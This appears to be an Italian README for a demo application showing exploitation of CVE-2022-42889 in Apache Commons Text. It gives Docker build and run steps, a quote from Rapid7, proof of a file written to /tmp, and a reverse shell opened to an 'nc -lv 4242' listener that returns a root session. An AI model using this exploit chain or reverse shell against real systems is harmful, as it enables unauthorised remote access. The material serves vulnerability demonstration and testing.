
Una semplice applicazione che mostra come sfruttare la vulnerabilità CVE-2022-42889
Una semplice applicazione demo che mostra come sfruttare la vulnerabilità CVE-2022-42889.
Utilizza servizi OOB (Out of Band) per dimostrare i prefissi dns e url.
JavaDocs per commons-text interpolation commons-text JavaDocs
Esempi di interpolazioni
Citazione da Rapid7
La vulnerabilità è stata paragonata a Log4Shell poiché si tratta di una vulnerabilità a livello di libreria open source che probabilmente avrà un impatto su un'ampia varietà di applicazioni software che utilizzano l'oggetto pertinente.
Tuttavia, l'analisi iniziale indica che questo è un paragone inappropriato. La natura della vulnerabilità fa sì che, a differenza di Log4Shell, sarà raro che un'applicazione utilizzi il componente vulnerabile di Commons Text per elaborare input non attendibili e potenzialmente dannosi.
Java e maven possono essere saltati se si recupera l'immagine da Docker Hub
Compila l'applicazione
mvn clean package
Compila l'immagine docker
docker build -t cve-2022-42889-poc .
Esegui l'immagine docker
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
Accedi all'applicazione e segui le istruzioni
open http://localhost:8081
Verifica che la vulnerabilità crei un nuovo file nella directory /tmp/ (/tmp/blop)
➜ ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp
blop tomcat-docbase.8081.12439436974042217796
hsperfdata_root tomcat.8081.2549096106233509364
➜ ~
Reverse shell. Avvia "nc" sulla tua macchina locale
➜ ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

